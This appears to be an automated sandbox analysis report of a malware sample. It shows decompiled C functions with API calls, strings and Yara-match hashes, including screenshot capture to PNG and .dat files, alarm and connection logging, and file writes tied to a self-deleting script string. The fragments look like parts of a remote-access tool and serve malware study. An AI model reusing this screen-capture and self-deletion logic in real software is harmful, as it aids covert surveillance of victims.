                              • String ID: Connection KeepAlive disabled$[WARNING]
                              • API String ID: 2993684571-804309475
                              • Opcode ID: 4142714a34967f6aba7196dcd1083ca1275fa1a77276a330c2e12a530647b9a0
                              • Instruction ID: 4a3f3a8db73678ad982533098c460406716fc9acf26f117caeb6870947dcbcc6
                              • Opcode Fuzzy Hash: 4142714a34967f6aba7196dcd1083ca1275fa1a77276a330c2e12a530647b9a0
                              • Instruction Fuzzy Hash: 4CF0C8718007507BDB113F759D0EA677F98DB01356F00057AF901926F2D9B585548B5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E004160D6(WCHAR* __ecx) {
                              				void* __edi;
                              				void* _t7;
                              				void* _t11;
                              				WCHAR* _t13;
                              				void* _t15;
                              
                              				_t16 = _t15 - 0x18;
                              				_t13 = __ecx;
                              				E00402064(_t7, _t15 - 0x18, "Alarm has been triggered!");
                              				E00402064(_t7, _t16 - 0x18, "[ALARM]");
                              				L004165D8(_t7, _t11);
                              				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
                              				Sleep(0x2710);
                              				return PlaySoundW(0, 0, 0);
                              			}

                              0x004160d8
                              0x004160db
                              0x004160e4
                              0x004160f3
                              0x004160f8
                              0x00416116
                              0x0041611d
                              0x0041612a

                              APIs
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416108
                              • PlaySoundW.WINMM(00000000,00000000), ref: 00416116
                              • Sleep.KERNEL32(00002710), ref: 0041611D
                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416126
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: PlaySound$HandleLocalModuleSleepTime
                              • String ID: Alarm has been triggered!$[ALARM]
                              • API String ID: 614609389-1190268461
                              • Opcode ID: 5adc81e4b1297545738adb94dadc43828fb03c5888ff549bd28b3a8ffb28104c
                              • Instruction ID: 2d10eecb587f4eb50cd82e886fdd1c0de5a54b8a21b058e5acdb0cdc04fd1f38
                              • Opcode Fuzzy Hash: 5adc81e4b1297545738adb94dadc43828fb03c5888ff549bd28b3a8ffb28104c
                              • Instruction Fuzzy Hash: FFE09262A00320379524377B7D0FD2F2D28CAC2BA2B01006FFA08661D29D944900C6FB
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 69%
                              			E004350A9(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                              				intOrPtr _v0;
                              				char _v8;
                              				signed int _v12;
                              				char _v16;
                              				signed int _v20;
                              				char _v24;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t61;
                              				void* _t64;
                              				signed int _t67;
                              				signed int _t69;
                              				signed int _t70;
                              				signed int _t73;
                              				signed int _t75;
                              				signed int _t77;
                              				signed int _t78;
                              				intOrPtr _t80;
                              				signed int _t81;
                              				void* _t82;
                              				signed int _t84;
                              				void* _t85;
                              				signed int _t87;
                              				signed int _t93;
                              				signed int _t102;
                              				void* _t104;
                              				signed int _t107;
                              				signed int* _t110;
                              				signed int* _t111;
                              				intOrPtr* _t113;
                              				signed int _t118;
                              				signed int _t120;
                              				signed int _t123;
                              				void* _t125;
                              				signed int _t128;
                              				signed int _t131;
                              				signed int _t139;
                              				signed int _t145;
                              				void _t147;
                              				void* _t148;
                              				void* _t150;
                              				void* _t152;
                              				signed int _t153;
                              				signed int _t154;
                              				void* _t155;
                              				signed int _t156;
                              				signed int _t157;
                              				signed int _t158;
                              				intOrPtr _t159;
                              
                              				_t139 = __edx;
                              				_t155 = _a4;
                              				if(_t155 == 0) {
                              					_t113 = L00439E14();
                              					_t159 = 0x16;
                              					 *_t113 = _t159;
                              					E0043626D();
                              					return _t159;
                              				}
                              				_push(__edi);
                              				_t123 = 9;
                              				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
                              				_t145 = _a8;
                              				__eflags = _t145;
                              				if(_t145 == 0) {
                              					_t111 = L00439E14();
                              					_t158 = 0x16;
                              					 *_t111 = _t158;
                              					E0043626D();
                              					_t78 = _t158;
                              					L12:
                              					return _t78;
                              				}
                              				_push(__ebx);
                              				__eflags =  *(_t145 + 4);
                              				if(__eflags <= 0) {
                              					if(__eflags < 0) {
                              						L10:
                              						_t110 = L00439E14();
                              						_t157 = 0x16;
                              						 *_t110 = _t157;
                              						_t78 = _t157;
                              						L11:
                              						goto L12;
                              					}
                              					__eflags =  *_t145;
                              					if( *_t145 < 0) {
                              						goto L10;
                              					}
                              				}
                              				_t64 = 7;
                              				__eflags =  *(_t145 + 4) - _t64;
                              				if(__eflags >= 0) {
                              					if(__eflags > 0) {
                              						goto L10;
                              					}
                              					__eflags =  *_t145 - 0x93406fff;
                              					if(__eflags > 0) {
                              						goto L10;
                              					}
                              				}
                              				L00441D1C(0, _t145, _t155, __eflags);
                              				_v12 = 0;
                              				_v16 = 0;
                              				_v8 = 0;
                              				_t67 = L00441551( &_v12);
                              				_pop(_t125);
                              				__eflags = _t67;
                              				if(_t67 == 0) {
                              					_t75 = L0044157D( &_v16);
                              					_pop(_t125);
                              					__eflags = _t75;
                              					if(_t75 == 0) {
                              						_t77 = L004415A9( &_v8);
                              						_pop(_t125);
                              						__eflags = _t77;
                              						if(_t77 == 0) {
                              							_t118 =  *(_t145 + 4);
                              							_t128 =  *_t145;
                              							__eflags = _t118;
                              							if(__eflags < 0) {
                              								L28:
                              								_push(_t145);
                              								_push(_t155);
                              								_t78 = E0043B307();
                              								__eflags = _t78;
                              								if(_t78 != 0) {
                              									goto L11;
                              								}
                              								__eflags = _v12;
                              								asm("cdq");
                              								_t147 =  *_t155;
                              								_t120 = _t139;
                              								if(__eflags == 0) {
                              									L32:
                              									_t80 = _v8;
                              									L33:
                              									asm("cdq");
                              									_t148 = _t147 - _t80;
                              									asm("sbb ebx, edx");
                              									_t81 = L004504E0(_t148, _t120, 0x3c, 0);
                              									 *_t155 = _t81;
                              									__eflags = _t81;
                              									if(_t81 < 0) {
                              										_t148 = _t148 + 0xffffffc4;
                              										 *_t155 = _t81 + 0x3c;
                              										asm("adc ebx, 0xffffffff");
                              									}
                              									_t82 = L00450430(_t148, _t120, 0x3c, 0);
                              									_t121 = _t139;
                              									_t28 = _t155 + 4; // 0x848d0045
                              									asm("cdq");
                              									_t150 = _t82 +  *_t28;
                              									asm("adc ebx, edx");
                              									_t84 = L004504E0(_t150, _t139, 0x3c, 0);
                              									 *(_t155 + 4) = _t84;
                              									__eflags = _t84;
                              									if(_t84 < 0) {
                              										_t150 = _t150 + 0xffffffc4;
                              										 *(_t155 + 4) = _t84 + 0x3c;
                              										asm("adc ebx, 0xffffffff");
                              									}
                              									_t85 = L00450430(_t150, _t121, 0x3c, 0);
                              									_t122 = _t139;
                              									_t31 = _t155 + 8; // 0xa824
                              									asm("cdq");
                              									_t152 = _t85 +  *_t31;
                              									asm("adc ebx, edx");
                              									_t87 = L004504E0(_t152, _t139, 0x18, 0);
                              									 *(_t155 + 8) = _t87;
                              									__eflags = _t87;
                              									if(_t87 < 0) {
                              										_t152 = _t152 + 0xffffffe8;
                              										 *(_t155 + 8) = _t87 + 0x18;
                              										asm("adc ebx, 0xffffffff");
                              									}
                              									_t131 = L00450430(_t152, _t122, 0x18, 0);
                              									__eflags = _t139;
                              									if(__eflags < 0) {
                              										L48:
                              										_t44 = _t155 + 0x18; // 0xa024848d
                              										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
                              										asm("cdq");
                              										_t153 = 7;
                              										_t51 = _t155 + 0xc; // 0x50506a00
                              										_t93 =  *_t51;
                              										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
                              										__eflags = _t93;
                              										if(_t93 > 0) {
                              											goto L43;
                              										}
                              										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
                              										 *(_t155 + 0xc) = _t93 + 0x1f;
                              										_t55 = _t131 + 0x16d; // 0x16d
                              										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
                              										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
                              										goto L44;
                              									} else {
                              										if(__eflags > 0) {
                              											L42:
                              											_t34 = _t155 + 0x18; // 0xa024848d
                              											asm("cdq");
                              											_t154 = 7;
                              											_t39 = _t155 + 0xc;
                              											 *_t39 =  *(_t155 + 0xc) + _t131;
                              											__eflags =  *_t39;
                              											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
                              											L43:
                              											_t42 = _t155 + 0x1c;
                              											 *_t42 =  *(_t155 + 0x1c) + _t131;
                              											__eflags =  *_t42;
                              											L44:
                              											_t78 = 0;
                              											goto L11;
                              										}
                              										__eflags = _t131;
                              										if(_t131 == 0) {
                              											__eflags = _t139;
                              											if(__eflags > 0) {
                              												goto L44;
                              											}
                              											if(__eflags < 0) {
                              												goto L48;
                              											}
                              											__eflags = _t131;
                              											if(_t131 >= 0) {
                              												goto L44;
                              											}
                              											goto L48;
                              										}
                              										goto L42;
                              									}
                              								}
                              								_push(_t155);
                              								_t102 = L00441D6D(_t120, _t147, _t155, __eflags);
                              								__eflags = _t102;
                              								if(_t102 == 0) {
                              									goto L32;
                              								}
                              								_t80 = _v8 + _v16;
                              								 *((intOrPtr*)(_t155 + 0x20)) = 1;
                              								goto L33;
                              							}
                              							if(__eflags > 0) {
                              								L20:
                              								_t104 = 7;
                              								__eflags = _t118 - _t104;
                              								if(__eflags > 0) {
                              									goto L28;
                              								}
                              								if(__eflags < 0) {
                              									L23:
                              									asm("cdq");
                              									_push( &_v24);
                              									asm("sbb ebx, edx");
                              									_v24 = _t128 - _v8;
                              									_push(_t155);
                              									_v20 = _t118;
                              									_t78 = E0043B307();
                              									__eflags = _t78;
                              									if(_t78 != 0) {
                              										goto L11;
                              									}
                              									__eflags = _v12 - _t78;
                              									if(__eflags == 0) {
                              										goto L44;
                              									}
                              									_push(_t155);
                              									_t107 = L00441D6D(_t118, _t145, _t155, __eflags);
                              									__eflags = _t107;
                              									if(_t107 == 0) {
                              										goto L44;
                              									}
                              									asm("cdq");
                              									_v24 = _v24 - _v16;
                              									_push( &_v24);
                              									asm("sbb [ebp-0x10], edx");
                              									_push(_t155);
                              									_t78 = E0043B307();
                              									__eflags = _t78;
                              									if(_t78 != 0) {
                              										goto L11;
                              									}
                              									 *((intOrPtr*)(_t155 + 0x20)) = 1;
                              									goto L44;
                              								}
                              								__eflags = _t128 - 0x933c7b7f;
                              								if(_t128 >= 0x933c7b7f) {
                              									goto L28;
                              								}
                              								goto L23;
                              							}
                              							__eflags = _t128 - 0x3f480;
                              							if(_t128 <= 0x3f480) {
                              								goto L28;
                              							}
                              							goto L20;
                              						}
                              					}
                              				}
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				E0043629A();
                              				asm("int3");
                              				_push(_t155);
                              				_t69 = E0043B2A2(_t125);
                              				_t156 = _t69;
                              				__eflags = _t156;
                              				if(_t156 != 0) {
                              					_push(_v0);
                              					_t70 = E004350A9(0, _t139, _t145, _t156);
                              					asm("sbb eax, eax");
                              					_t73 =  !( ~_t70) & _t156;
                              					__eflags = _t73;
                              					return _t73;
                              				}
                              				return _t69;
                              			}

                              APIs
                              • __allrem.LIBCMT ref: 00435236
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435252
                              • __allrem.LIBCMT ref: 00435269
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435287
                              • __allrem.LIBCMT ref: 0043529E
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004352BC
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 1992179935-0
                              • Opcode ID: ddd8ce45931a40e5443d8a9b3d2240e4d1af6a873fc9811b2285e9f9c346daaf
                              • Instruction ID: 0f9574e79e851dcb61412f9348aa4e336ac1525895054df9afc56f3bdc95fefa
                              • Opcode Fuzzy Hash: ddd8ce45931a40e5443d8a9b3d2240e4d1af6a873fc9811b2285e9f9c346daaf
                              • Instruction Fuzzy Hash: B6813E72A00F059BEB20AE69CC42B6B73E8DF49768F14552FF511D7382E778D9408B98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E0041510D(void* __ecx, void* __edx, void* __eflags) {
                              				char _v1048;
                              				char _v1056;
                              				char _v1092;
                              				void* _v1096;
                              				char _v1112;
                              				char _v1120;
                              				void* _v1124;
                              				void* _v1136;
                              				char _v1144;
                              				char _v1152;
                              				char _v1156;
                              				void* _v1160;
                              				char _v1184;
                              				char _v1200;
                              				void* _v1204;
                              				char _v1224;
                              				char _v1232;
                              				void* __ebx;
                              				void* __edi;
                              				void* __ebp;
                              				intOrPtr* _t39;
                              				void* _t54;
                              				void* _t57;
                              				void* _t60;
                              				void* _t67;
                              				void* _t73;
                              				char* _t84;
                              				char* _t86;
                              				void* _t120;
                              				void* _t121;
                              				void* _t123;
                              				intOrPtr* _t124;
                              				signed int _t128;
                              				void* _t130;
                              
                              				_t133 = __eflags;
                              				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
                              				_t121 = __ecx;
                              				_t74 = __edx;
                              				E00403086(__edx,  &_v1184, E0040425F(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
                              				L00401ED0();
                              				E004142A5( &_v1120, __edx, __eflags, 0);
                              				_t84 =  &_v1120;
                              				_t39 =  *0x46bd10(L00401F75(_t84), L00402469(), _t120, _t123, _t73);
                              				_t124 = _t39;
                              				L00413DBA( &_v1144, _t124);
                              				_t86 = L"image/png";
                              				L00414611(_t86,  &_v1112);
                              				L00413E32(L00401ECB( &_v1200),  &_v1152, _t43,  &_v1112);
                              				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
                              				if( *((char*)(L00401F75(L00401E29(0x46c578,  &_v1112, _t133, 0x1b)))) == 1) {
                              					E004020B5(__edx,  &_v1224);
                              					_t54 = E00417334(L00401ECB( &_v1200),  &_v1224);
                              					_t135 = _t54;
                              					if(_t54 != 0) {
                              						DeleteFileW(L00401ECB( &_v1200));
                              						_t57 = L00402469();
                              						L00405A2F( &_v1048, L00401F75(0x46c560), _t57);
                              						_t60 = L00402469();
                              						L00405B57(_t74,  &_v1056,  &_v1224,  &_v1184, L00401F75( &_v1232), _t60);
                              						E00403086(_t74,  &_v1120, E0040425F(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
                              						L00401ED0();
                              						_t67 = L00401ECB( &_v1120);
                              						E004020CC(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
                              						L004173A6(_t67);
                              						L00401ED0();
                              						L00401FA7();
                              					}
                              					_t48 = L00401FA7();
                              				}
                              				L00413DE0(_t48,  &_v1152);
                              				L00401FA7();
                              				return L00401ED0();
                              			}

                              0x0041510d
                              0x00415113
                              0x0041511c
                              0x0041511e
                              0x00415135
                              0x0041513f
                              0x0041514c
                              0x0041515c
                              0x00415166
                              0x0041516d
                              0x00415174
                              0x00415180
                              0x00415185
                              0x004151a1
                              0x004151a9
                              0x004151c2
                              0x004151cc
                              0x004151e0
                              0x004151e5
                              0x004151e7
                              0x004151f7
                              0x00415204
                              0x00415219
                              0x00415222
                              0x0041523e
                              0x0041525e
                              0x0041526b
                              0x00415277
                              0x00415288
                              0x0041528f
                              0x0041529e
                              0x004152a7
                              0x004152a7
                              0x004152b0
                              0x004152b0
                              0x004152b9
                              0x004152c2
                              0x004152d6

                              APIs
                                • Part of subcall function 004142A5: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
                                • Part of subcall function 004142A5: CreateCompatibleDC.GDI32(00000000), ref: 004142CC
                              • SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 00415166
                                • Part of subcall function 00413DBA: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00413DD0
                                • Part of subcall function 00413E32: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00413E43
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D90), ref: 00417351
                              • DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
                              • String ID: dat$image/png$png
                              • API String ID: 1095564277-186023265
                              • Opcode ID: 324acede04209f88abe064a2bb7982f93cd85cd0cfaadc48bf52832e5e4252ee
                              • Instruction ID: ec78f574bbb469ede11c5765e841e4de501cabfd3cecff2c18e23e093a1ab6d9
                              • Opcode Fuzzy Hash: 324acede04209f88abe064a2bb7982f93cd85cd0cfaadc48bf52832e5e4252ee
                              • Instruction Fuzzy Hash: 9B4164721043405AC314FB62DC56DEFB7A9AF91348F40093FF586671E2EF385A49CA9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E00405165(void* __ecx, void* __edi) {
                              				void* __ebx;
                              				long _t19;
                              				intOrPtr _t28;
                              				void* _t29;
                              				void* _t30;
                              				void* _t31;
                              				intOrPtr _t38;
                              
                              				_t29 = __edi;
                              				_t30 = __ecx;
                              				 *((intOrPtr*)(__ecx + 0x60)) = 0;
                              				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
                              					L3:
                              					 *((char*)(_t30 + 0x50)) = 0;
                              					_t38 =  *0x46bb07; // 0x0
                              					if(_t38 != 0) {
                              						_t32 = _t31 - 0x18;
                              						E00402064(0, _t31 - 0x18, "Connection timeout");
                              						E00402064(0, _t32 - 0x18, "[WARNING]");
                              						L004165D8(0, _t29);
                              					}
                              					L00404DD5(_t30);
                              					return 1;
                              				} else {
                              					goto L1;
                              				}
                              				while(1) {
                              					L1:
                              					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
                              					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
                              					_t28 =  *((intOrPtr*)(_t30 + 0x60));
                              					if(_t19 == 0) {
                              						break;
                              					}
                              					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
                              						continue;
                              					}
                              					goto L3;
                              				}
                              				CloseHandle( *(_t30 + 0x54));
                              				 *(_t30 + 0x54) = 0;
                              				 *((char*)(_t30 + 0x50)) = 0;
                              				SetEvent( *(_t30 + 0x58));
                              				return 0;
                              			}

                              0x00405165
                              0x00405167
                              0x0040516b
                              0x00405171
                              0x00405190
                              0x00405190
                              0x00405193
                              0x00405199
                              0x0040519b
                              0x004051a5
                              0x004051b4
                              0x004051b9
                              0x004051be
                              0x004051c3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405173
                              0x00405173
                              0x0040517b
                              0x00405181
                              0x00405184
                              0x00405189
                              0x00000000
                              0x00000000
                              0x0040518e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040518e
                              0x004051d1
                              0x004051da
                              0x004051dd
                              0x004051e0
                              0x00000000

                              APIs
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405160), ref: 0040517B
                              • CloseHandle.KERNEL32(?), ref: 004051D1
                              • SetEvent.KERNEL32(?), ref: 004051E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandleObjectSingleWait
                              • String ID: Connection timeout$[WARNING]
                              • API String ID: 2055531096-1470507543
                              • Opcode ID: 5c9440fae83593d4e53e6a5a4215dc2b96a8acf04a93199ab539a1b889046901
                              • Instruction ID: ae60f77654cc690ea069452027dfbba6838492d045179776455cce24e18ac643
                              • Opcode Fuzzy Hash: 5c9440fae83593d4e53e6a5a4215dc2b96a8acf04a93199ab539a1b889046901
                              • Instruction Fuzzy Hash: C301D431A04F40AFC725BF35895651BBFA1EF0134A740083EE48396AA2CBB99408CB4A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E0043C2CD(signed int* __ecx, signed int __edx) {
                              				signed int _v8;
                              				intOrPtr* _v12;
                              				signed int _v16;
                              				signed int _t28;
                              				signed int _t29;
                              				intOrPtr _t33;
                              				signed int _t37;
                              				signed int _t38;
                              				signed int _t40;
                              				void* _t50;
                              				signed int _t56;
                              				intOrPtr* _t57;
                              				signed int _t68;
                              				signed int _t71;
                              				signed int _t72;
                              				signed int _t74;
                              				signed int _t75;
                              				signed int _t78;
                              				signed int _t80;
                              				signed int* _t81;
                              				signed int _t85;
                              				void* _t86;
                              
                              				_t72 = __edx;
                              				_v12 = __ecx;
                              				_t28 =  *__ecx;
                              				_t81 =  *_t28;
                              				if(_t81 != 0) {
                              					_t29 =  *0x46a00c; // 0x7df2b874
                              					_t56 =  *_t81 ^ _t29;
                              					_t78 = _t81[1] ^ _t29;
                              					_t83 = _t81[2] ^ _t29;
                              					asm("ror edi, cl");
                              					asm("ror esi, cl");
                              					asm("ror ebx, cl");
                              					if(_t78 != _t83) {
                              						L14:
                              						 *_t78 = L00440C0D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                              						_t33 = L0042E9F4(_t56);
                              						_t57 = _v12;
                              						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                              						_t24 = _t78 + 4; // 0x4
                              						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = L0042E9F4(_t24);
                              						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = L0042E9F4(_t83);
                              						_t37 = 0;
                              						L15:
                              						return _t37;
                              					}
                              					_t38 = 0x200;
                              					_t85 = _t83 - _t56 >> 2;
                              					if(_t85 <= 0x200) {
                              						_t38 = _t85;
                              					}
                              					_t80 = _t38 + _t85;
                              					if(_t80 == 0) {
                              						_t80 = 0x20;
                              					}
                              					if(_t80 < _t85) {
                              						L9:
                              						_push(4);
                              						_t80 = _t85 + 4;
                              						_push(_t80);
                              						_v8 = L00446905(_t56);
                              						_t40 = L0043EE85(0);
                              						_t68 = _v8;
                              						_t86 = _t86 + 0x10;
                              						if(_t68 != 0) {
                              							goto L11;
                              						}
                              						_t37 = _t40 | 0xffffffff;
                              						goto L15;
                              					} else {
                              						_push(4);
                              						_push(_t80);
                              						_v8 = L00446905(_t56);
                              						L0043EE85(0);
                              						_t68 = _v8;
                              						_t86 = _t86 + 0x10;
                              						if(_t68 != 0) {
                              							L11:
                              							_t56 = _t68;
                              							_v8 = _t68 + _t85 * 4;
                              							_t83 = _t68 + _t80 * 4;
                              							_t78 = _v8;
                              							_push(0x20);
                              							asm("ror eax, cl");
                              							_t71 = _t78;
                              							_v16 = 0 ^  *0x46a00c;
                              							asm("sbb edx, edx");
                              							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                              							_v8 = _t74;
                              							if(_t74 == 0) {
                              								goto L14;
                              							}
                              							_t75 = _v16;
                              							_t50 = 0;
                              							do {
                              								_t50 = _t50 + 1;
                              								 *_t71 = _t75;
                              								_t71 = _t71 + 4;
                              							} while (_t50 != _v8);
                              							goto L14;
                              						}
                              						goto L9;
                              					}
                              				}
                              				return _t28 | 0xffffffff;
                              			}

                              0x0043c2cd
                              0x0043c2d7
                              0x0043c2db
                              0x0043c2dd
                              0x0043c2e1
                              0x0043c2eb
                              0x0043c2fc
                              0x0043c301
                              0x0043c303
                              0x0043c305
                              0x0043c307
                              0x0043c309
                              0x0043c30d
                              0x0043c3c7
                              0x0043c3d5
                              0x0043c3d7
                              0x0043c3dc
                              0x0043c3e3
                              0x0043c3e5
                              0x0043c3f3
                              0x0043c402
                              0x0043c405
                              0x0043c407
                              0x00000000
                              0x0043c408
                              0x0043c315
                              0x0043c31a
                              0x0043c31f
                              0x0043c321
                              0x0043c321
                              0x0043c323
                              0x0043c328
                              0x0043c32c
                              0x0043c32c
                              0x0043c32f
                              0x0043c34e
                              0x0043c34e
                              0x0043c350
                              0x0043c353
                              0x0043c35c
                              0x0043c35f
                              0x0043c364
                              0x0043c367
                              0x0043c36c
                              0x00000000
                              0x00000000
                              0x0043c36e
                              0x00000000
                              0x0043c331
                              0x0043c331
                              0x0043c333
                              0x0043c33c
                              0x0043c33f
                              0x0043c344
                              0x0043c347
                              0x0043c34c
                              0x0043c376
                              0x0043c379
                              0x0043c37b
                              0x0043c37e
                              0x0043c386
                              0x0043c38c
                              0x0043c393
                              0x0043c395
                              0x0043c39d
                              0x0043c3ac
                              0x0043c3b0
                              0x0043c3b2
                              0x0043c3b5
                              0x00000000
                              0x00000000
                              0x0043c3b7
                              0x0043c3ba
                              0x0043c3bc
                              0x0043c3bc
                              0x0043c3bd
                              0x0043c3bf
                              0x0043c3c2
                              0x00000000
                              0x0043c3bc
                              0x00000000
                              0x0043c34c
                              0x0043c32f
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
                              • Instruction ID: b8c2f117a08c9f7e3d0690f36157727bc88d5e2796b8de3530b344be676623de
                              • Opcode Fuzzy Hash: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
                              • Instruction Fuzzy Hash: A641F772A002109FCB10DF79C881A6EB3B5EF89314F15816EE915EB341EB34ED01CB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E0041729F(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
                              				void* _v8;
                              				long _v12;
                              				long _t10;
                              				long _t11;
                              				struct _OVERLAPPED* _t16;
                              				struct _OVERLAPPED* _t21;
                              				long _t24;
                              				long _t27;
                              				void* _t30;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t21 = 0;
                              				_v8 = __ecx;
                              				_t27 = __edx;
                              				_t10 = _a8;
                              				if(_t10 == 0) {
                              					_t11 = 0x40000000;
                              					_t24 = 2;
                              				} else {
                              					if(_t10 != 1) {
                              						_t11 = _a8;
                              						_t24 = _a8;
                              					} else {
                              						_t11 = 4;
                              						_t24 = _t11;
                              					}
                              				}
                              				_t30 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21);
                              				if(_t30 != 0xffffffff) {
                              					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
                              						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
                              							_t21 = 1;
                              						}
                              						CloseHandle(_t30);
                              						_t16 = _t21;
                              						goto L13;
                              					} else {
                              						CloseHandle(_t30);
                              						goto L6;
                              					}
                              				} else {
                              					L6:
                              					_t16 = 0;
                              					L13:
                              					return _t16;
                              				}
                              			}

                              0x004172a2
                              0x004172a3
                              0x004172a9
                              0x004172ab
                              0x004172af
                              0x004172b1
                              0x004172b3
                              0x004172cb
                              0x004172d0
                              0x004172b5
                              0x004172b8
                              0x004172c1
                              0x004172c4
                              0x004172ba
                              0x004172bc
                              0x004172bd
                              0x004172bd
                              0x004172b8
                              0x004172e4
                              0x004172e9
                              0x004172f3
                              0x00417320
                              0x00417322
                              0x00417322
                              0x00417325
                              0x0041732b
                              0x00000000
                              0x00417305
                              0x00417306
                              0x00000000
                              0x00417306
                              0x004172eb
                              0x004172eb
                              0x004172eb
                              0x0041732d
                              0x00417333
                              0x00417333

                              APIs
                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F714,00000000,00000000,?,0040B43F,00000000,00000000), ref: 004172DE
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B43F,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004172FA
                              • CloseHandle.KERNEL32(00000000,?,0040B43F,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 00417306
                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,0040B43F,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 00417318
                              • CloseHandle.KERNEL32(00000000,?,0040B43F,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 00417325
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreatePointerWrite
                              • String ID:
                              • API String ID: 1852769593-0
                              • Opcode ID: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
